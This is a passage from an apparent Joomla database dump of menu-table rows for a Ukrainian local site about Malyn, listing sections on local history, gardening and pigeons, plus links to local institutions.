\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',41,50,0,'*',0),(108,'mainmenu','Про Малинщину','2010-06-06-03-57-58','','2010-06-05-12-55-45/2010-06-06-03-57-58','index.php?option=com_content&view=category&layout=blog&id=12','component',-2,105,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',42,43,0,'*',0),(110,'mainmenu','Відеоогляд','2010-06-06-09-34-01','','2010-06-05-12-55-45/2010-06-06-09-34-01','index.php?option=com_content&view=category&layout=blog&id=14','component',-2,105,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'',44,45,0,'*',0),(111,'mainmenu','Малинщина та Голодомор 1932-33 рр.','---1932-33-','','2010-06-05-12-55-45/---1932-33-','index.php?option=com_content&view=category&layout=blog&id=15','component',-2,105,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'',46,47,0,'*',0),(203,'top2','Контакти','kontakti','','kontakti','index.php?option=com_content&view=category&layout=blog&id=64','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',1,2,0,'*',0),(247,'mainmenu','Квітуче село','kvituche-selo','','2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo','index.php?option=com_joomgallery&view=category&catid=4','component',-2,109,2,10076,0,'0000-00-00 00:00:00',0,1,'',0,'{\"disable_global_info\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',46,47,0,'*',0),(252,'top','Продукція Юнігран','2014-09-30-06-38-57','','2014-09-30-06-38-57','http://www.unigran.ua/ua/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',51,52,0,'*',0),(253,'top','Малинська міська рада','2014-09-30-06-41-23','','2014-09-30-06-41-23','http://malyn-rada.gov.ua/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',55,56,0,'*',0),(255,'top','Малинівська школа','2014-09-30-06-44-20','','2014-09-30-06-44-20','http://malunivka.at.ua/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',57,58,0,'*',0),(297,'top','ММЦПМСД','2015-07-14-12-51-41','','2015-07-14-12-51-41','http://kzmmrcpmsd.ucoz.com/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',59,60,0,'*',0),(298,'top','Продукція Полісся','2015-07-22-15-57-33','','2015-07-22-15-57-33','http://vipgranit.com.ua/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}',53,54,0,'*',0),(335,'top','Лісотехнічний коледж','2015-09-20-17-13-42','','2015-09-20-17-13-42','http://mltk.co.ua/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1}',61,62,0,'*',0),(342,'main','com_tags','Tags','','Tags','index.php?option=com_tags','component',1,1,1,29,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'',35,36,0,'',1),(343,'main','com_postinstall','Post-installation messages','','Post-installation messages','index.php?option=com_postinstall','component',1,1,1,32,0,'0000-00-00 00:00:00',0,1,'class:postinstall',0,'',37,38,0,'*',1),(350,'main','ATTACH_ATTACHMENTS','attach-attachments','','attach-attachments','index.php?option=com_attachments','component',1,1,1,10124,0,'0000-00-00 00:00:00',0,1,'../media/com_attachments/images/attachments.png',0,'{}',63,68,0,'',1),(351,'main','ATTACH_ADD_NEW_ATTACHMENT','attach-add-new-attachment','','attach-attachments/attach-add-new-attachment','index.php?option=com_attachments&task=attachment.add','component',1,350,2,10124,0,'0000-00-00 00:00:00',0,1,'class:newarticle',0,'{}',64,65,0,'',1),(352,'main','JTOOLBAR_OPTIONS','jtoolbar-options','','attach-attachments/jtoolbar-options','index.php?option=com_attachments&task=params.edit','component',1,350,2,10124,0,'0000-00-00 00:00:00',0,1,'class:config',0,'{}',66,67,0,'',1),(371,'mainmenu','Фотогалерея','fotogalereya','','2010-06-05-12-55-45/fotogalereya','index.php?option=com_content&view=category&layout=blog&id=82','component',-2,105,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',48,49,0,'*',0),(373,'main','COM_XMAP_TITLE','com-xmap-title','','com-xmap-title','index.php?option=com_xmap','component',1,1,1,10163,0,'0000-00-00 00:00:00',0,1,'components/com_xmap/images/xmap-favicon.png',0,'{}',69,70,0,'',1),(388,'top','Бібліотека ім.Скуратівського','2016-02-06-08-54-28','','2016-02-06-08-54-28','http://bibliomalin.blogspot.com/','url',1,1,1,0,0,'0000-00-00 00:00:00',1,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1}',71,72,0,'*',0),(412,'top','Історія Малина','2016-04-14-11-22-34','','2016-04-14-11-22-34','http://history-malyn.in.ua/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1}',73,74,0,'*',0),(446,'main','com_joomlaupdate','com-joomlaupdate','','com-joomlaupdate','index.php?option=com_joomlaupdate','component',1,1,1,28,0,'0000-00-00 00:00:00',0,1,'class:joomlaupdate',0,'{}',75,76,0,'',1),(517,'top','Ворсівська громада','vorsivska-silska-rada','','vorsivska-silska-rada','http://www.vorsivka.zt.ua/','url',0,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1}',77,78,0,'*',0),(541,'main','com_associations','multilingual-associations','','multilingual-associations','index.php?option=com_associations','component',1,1,1,34,0,'0000-00-00 00:00:00',0,1,'class:associations',0,'{}',79,80,0,'*',1),(546,'top','Малинський лісгосп АПК','malynskyi-lishosp-apk','','malynskyi-lishosp-apk','http://www.malinapk.net/index.php','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1}',81,82,0,'*',0),(547,'top','Малинське лісове господарство','malynske-lisove-hospodarstvo','','malynske-lisove-hospodarstvo','http://malynlis.com.ua/golovna.html','url',0,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1}',83,84,0,'*',0),(679,'top','КНП \"МЦПМСД\" ММР','knp-mtspmsd','','knp-mtspmsd','https://mal-centr.pmsd.org.ua/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1}',85,86,0,'*',0),(707,'top','фабрика Вайдманн','viddil-osvity','','viddil-osvity','http://weidmann-mpm.com/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1}',87,88,0,'*',0),(708,'main','COM_AKEEBA','com-akeeba','','com-akeeba','index.php?option=com_akeeba','component',1,1,1,10176,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',89,90,0,'',1),(778,'top','КЛАСНЕ РАДІО','istoriia-mmalyn','','istoriia-mmalyn','http://mjoyradio.com/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1}',91,92,0,'*',0),(815,'mainmenu','Садівництво','sadivnytstvo','','sadivnytstvo','index.php?option=com_content&view=category&layout=blog&id=122','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',93,98,0,'*',0),(816,'mainmenu','Засоби захисту','zasoby-zakhystu','','sadivnytstvo/zasoby-zakhystu','index.php?option=com_content&view=category&layout=blog&id=123','component',1,815,2,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',94,95,0,'*',0),(817,'mainmenu','Догляд ','dohliad','','sadivnytstvo/dohliad','index.php?option=com_content&view=category&layout=blog&id=124','component',1,815,2,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',96,97,0,'*',0),(818,'mainmenu','Голуби','holuby','','holuby','index.php?option=com_content&view=category&layout=blog&id=125','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',99,112,0,'*',0),(819,'mainmenu','Поштові','poshtovi','','holuby/poshtovi','index.php?option=com_content&view=category&layout=blog&id=126','component',1,818,2,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',100,101,0,'*',0),(820,'mainmenu','Кінги','kinhy','','holuby/kinhy','index.php?option=com_content&view=category&layout=blog&id=127','component',1,818,2,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',102,103,0,'*',0),(821,'mainmenu','Павліни (павичі)','pavliny-pavychi','','holuby/pavliny-pavychi','index.php?option=com_content&view=category&layout=blog&id=128','component',1,818,2,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',104,105,0,'*',0),(822,'mainmenu','Контакти','rizni-porady','','rizni-porady','index.php?option=com_content&view=category&layout=blog&id=129','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\